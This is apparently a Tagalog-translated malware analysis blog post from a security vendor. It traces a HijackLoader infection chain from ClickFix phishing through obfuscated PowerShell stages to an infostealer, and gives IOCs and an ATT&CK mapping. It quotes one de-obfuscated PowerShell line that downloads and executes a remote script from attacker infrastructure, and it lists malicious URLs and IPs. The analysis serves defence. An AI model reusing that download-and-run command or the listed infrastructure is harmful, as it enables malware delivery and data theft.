Talaan ng nilalaman
- pagpapakilala
-
- Ang Umuunlad na Banta ng Mga Attack Loader
-
- Layunin ng Blog na Ito
- Teknikal na Pamamaraan at Pagsusuri
-
- Initial Access at Social Engineering
-
- Multi-Stage Obfuscation at De-obfuscation
-
- Anti-Analysis Techniques
-
- Ang Huling Payload
- Konklusyon
- Mga IOC
- Mabilis na Paggaling Seqrite proteksyon
- MITER ATT&CK Mapping
pagpapakilala
Sa ebolusyon ng mga banta sa cyber, ang panghuling pagpapatupad ng isang nakakahamak na payload ay hindi na ang tanging pokus ng industriya ng cybersecurity. Ang mga attack loader ay lumitaw bilang isang kritikal na elemento ng mga modernong pag-atake, na nagsisilbing pangunahing vector para sa paunang pag-access at nagbibigay-daan sa lihim na paghahatid ng sopistikadong malware sa loob ng isang organisasyon. Hindi tulad ng mga simpleng payload, ang mga loader ay inengineered na may nakatuong layunin: upang iwasan ang mga panseguridad na depensa, magtatag ng pagtitiyaga, at lumikha ng isang paborableng kapaligiran para sa nakatagong pagpapatupad ng panghuling yugto ng malware. Ginagawa nitong mas makabuluhan at nauugnay na banta ang mga ito na nangangailangan ng nakatutok na pagsusuri.
Kamakailan lamang ay nakasaksi tayo ng pagdami ng HijackLoader malware. Una itong lumitaw noong ikalawang kalahati ng 2023 at mabilis na nakakuha ng atensyon dahil sa kakayahan nitong maghatid ng mga payload at mga kawili-wiling pamamaraan nito para sa paglo-load at pagpapatupad ng mga ito. Kadalasan itong lumilitaw bilang Malware-as-a-Service , na naobserbahan pangunahin sa mga kampanyang may motibasyon sa pananalapi sa buong mundo.
Ang HijackLoader ay naipakalat sa pamamagitan ng mga pekeng installer, mga website na nilason ng SEO , mga nag-ma-malvertise, at mga pirated na software/movie portal , na nagsisiguro ng malawak at oportunistang base ng mga biktima.
Mula noong Hunyo 2025, naobserbahan namin ang mga umaatake na gumagamit ng Clickfix kung saan pinangunahan nito ang mga hindi pinaghihinalaang biktima na mag-download ng mga nakakahamak na .msi installer na nagresulta naman sa pagpapatupad ng HijackLoader. Napagmasdan ang DeerStealer na dina-download bilang huling executable sa makina ng biktima noon.
Kamakailan, napagmasdan din na ang TAG-150 ay lumitaw kasama ng CastleLoader/CastleBot, habang ginagamit din ang mga panlabas na serbisyo gaya ng HijackLoader bilang bahagi ng mas malawak nitong Malware-as-a-Service ecosystem.
Madalas na naghahatid ang HijackLoader ng mga stealer at RAT habang patuloy na pinagbubuti ang kasanayan nito. Kilalang-kilala ito sa mga advanced na pamamaraan ng pag-iwas tulad ng:
- Iproseso ang doppelgänging gamit ang mga natransaktong seksyon
- I-unhook ang mga DLL ng system
- Mga direktang syscall sa ilalim ng WOW64
- Call-stack spoofing
- Mga pagsusuri sa anti-VM
Mula nang matuklasan ito, ang HijackLoader ay patuloy na umunlad, na nagpapakita ng patuloy at tumataas na banta sa iba't ibang industriya. Samakatuwid, kritikal para sa mga organisasyon na magtatag at mapanatili ang tuluy-tuloy na pagsubaybay para sa mga naturang loader upang mabawasan ang panganib ng mga sopistikado, multi-stage na pag-atake.
Chain ng Impeksyon

Pangkalahatang-ideya ng Teknikal
Ang unang pag-access ay nagsisimula sa isang kampanyang phishing na batay sa CAPTCHA, na aming tinukoy bilang Clickfix (Ang pamamaraang ito ay nakitang ginagamit din ng mga umaatake noong Hunyo 2025).


Ang HTA file na ito ay nagsisilbing paunang downloader, na humahantong sa pagpapatupad ng isang PowerShell file.

Sa pag-decode ng Base64-encoded string sa itaas, nakakuha kami ng isa pang PowerShell script, tulad ng ipinapakita sa ibaba.

Ang na-decode na PowerShell script sa itaas ay labis na na-obfuscate, na nagpapakita ng malaking hamon sa static na pagsusuri at pagtukoy na nakabatay sa lagda. Sa halip na gumamit ng mga nababasang string at variable, dynamic itong bumubuo ng mga command at value sa pamamagitan ng mga kumplikadong mathematical na operasyon at ang muling pagtatayo ng mga string mula sa mga array ng character.
Habang nireresolba ang payload sa itaas, nakikita namin na nade-decode ito sa command sa ibaba, na habang hindi pa rin nababasa, ay maaaring ganap na ma-de-obfuscate.

Pagkatapos ng buong de-obfuscation, nakita namin na sinusubukan ng script na kumonekta sa isang URL upang mag-download ng kasunod na file.
iex ((New-Object System.Net.WebClient).DownloadString('https://rs.mezi[.]bet/samie_bower.mp3'))
Kapag tumakbo sa isang debugger, ang script na ito ay nagbabalik ng isang error, na nagpapahiwatig na hindi ito makakonekta sa URL.

Ang file na samie-bower.mp3 ay isa pang PowerShell script, na sa mahigit 18,000 linya ay lubhang natatakpan at kumakatawan sa susunod na yugto ng loader.

Sa pamamagitan ng pag-debug, naobserbahan namin na ang PowerShell file na ito ay nagsasagawa ng maraming pagsusuri sa Anti-VM , kabilang ang pagsisiyasat sa bilang ng mga tumatakbong proseso at paggawa ng mga pagbabago sa mga registry key.

Ang mga pagsusuring ito ay tila partikular na nagta-target at nagbabasa ng mga VirtualBox identifier upang matukoy kung ang script ay tumatakbo sa isang virtualized na kapaligiran.
Habang sinusuri ang script, napagmasdan namin na ang panghuling payload ay nasa loob ng huling ilang linya, kung saan ang paunang obfuscated loader ay naghahatid ng panghuling malisyosong utos.

Ang deklarasyon sa itaas na walang kwentang variable ay nalutas na; sa pagpapatupad, nagsasagawa ito ng Base64 decoding, mga operasyon ng XOR, at karagdagang mga gawain sa pag-decryption, bago mag-load ng isa pang PowerShell script na malamang na nag-inject ng PE file.


Ang pag-decode sa file na ito ay nagpapakita ng isang naka-embed na PE file, na makikilala sa pamamagitan ng MZ header nito na.

Ang PE file na ito ay isang .NET executable na puno ng laman.

Ang executable payload ay naglo-load ng malaking halaga ng code, malamang na kinuha mula sa seksyon ng mga mapagkukunan nito.

Kapag na-unpack, ang executable payload ay lalabas na naglo-load ng isang DLL file.

Ang DLL file na ito ay pinoprotektahan din, malamang na maiwasan ang reverse engineering at pagsusuri.

Ang HijackLoader ay may kasaysayan ng paggamit ng isang prosesong may maraming yugto na kinasasangkutan ng isang executable na sinusundan ng isang DLL. Ang huling yugtong ito ng loader ay nagtatangkang kumonekta sa isang C2 server, kung saan dina-download ang isang infostealer malware . Sa kasong ito, tinatangkang kumonekta ng malware ang URL sa ibaba.

Bagama't hindi na maa-access ang C2 na ito, ang pagtatangkang kumonekta ay naaayon sa pag-uugali ng NekoStealer Malware . Ang HijackLoader na ito ay nasangkot sa pag-download ng iba't ibang stealer malware kabilang na rin ang Lumma.
Konklusyon
Ang matagumpay na pagtatanggol laban sa mga sopistikadong loader tulad ng HijackLoader ay nangangailangan ng paglipat ng focus mula sa static, panghuling yugto ng mga payload patungo sa kanilang dynamic at patuloy na nagbabagong mga mekanismo ng paghahatid. Sa pamamagitan ng pagtutuon ng pansin sa pag-detect ng paunang pag-access at mga intermediate na yugto ng obfuscation, ang mga organisasyon ay maaaring bumuo ng mas nababanat na mga depensa laban sa patuloy na banta na ito. Parehong mahalaga na magpatibay ng isang proactive na diskarte sa lahat ng mga layer, sa halip na tumuon lamang sa paunang pag-access o sa huling payload. Ang mga intermediate na layer ay madalas kung saan ipinakilala ng mga umaatake ang pinakamahalagang pagbabago upang mapadali ang matagumpay na pag-deploy ng malware.
Mga IOC:
- 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57
- 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4
- 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df
- 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d
- 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184
- e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82
- 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd
- c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e
- D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4
- 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee
- hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta
- 91[.]212[.]166[.]51
- 37[.]27[.]165[.]65:1477
- cosi[.]com[.]ar
- hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3
- hxxp[:]//77[.]91[.]101[.]66/
Mabilis na Paggaling Seqrite Proteksyon:
- Script.Trojan.49900.GC
- Loader.StealerDropperCiR
- Trojan.InfoStealerCiR
- Trojan.Agent
- BDS/511
MITRE Att&ck:
| Pantaktika | Technique ID | Pangalan ng Teknik |
| Paunang Pag-access | T1566.002 | Phishing: Spearphishing Link (CAPTCHA phishing page) |
| T1189 | Drive-by Compromise (malvertising, SEO poisoning, pekeng installer) | |
| Pagpapatupad | T1059.001 | Command and Scripting Interpreter: PowerShell |
| Pag-iwas sa Depensa | T1027 | Mga Na-obfuscate na File o Impormasyon (mga multi-stage na na-obfuscate na script) |
| T1140 | I-deobfuscate/Decode ang mga File o Impormasyon (Base64, XOR decoding) | |
| T1562.001 | Impair Defenses: I-disable o Baguhin ang Tools (unhooking DLLs) | |
| T1070.004 | Pag-alis ng Tagapagpahiwatig: Pagtanggal ng File (malamang na ginagamit sa mga naka-stage na loader) | |
| T1211 | Pagsasamantala para sa Pag-iwas sa Depensa (mga direktang syscall sa ilalim ng WOW64) | |
| T1036 | Pagbabalatkayo (mga pekeng extension tulad ng .mp3 para sa mga PowerShell script) | |
| Pagkatuklas | T1082 | System Information Discovery (VM checks, registry query) |
| T1497.001 | Virtualization/Sandbox Evasion: Mga Pagsusuri ng System | |
| Pagtitiyaga | T1547.001 | Boot o Logon Autostart Execution: Registry Run Keys (registry tampering) |
| Pagtitiyaga / Pribilehiyo Esc. | T1055 | Proseso ng Pag-iniksyon (PE injection routines) |
| Command at Control (C2) | T1071.001 | Application Layer Protocol: Mga Web Protocol (HTTP/HTTPS C2 traffic) |
| T1105 | Ingress Tool Transfer (pagda-download ng mga karagdagang payload) | |
| Epekto / Koleksyon | T1056 / T1005 | Input Capture / Data mula sa Local System (pag-andar ng info-stealer ng final payload) |
Mga May-akda:
Niraj Lazarus Makasare
Shrutirupa Banerjiee



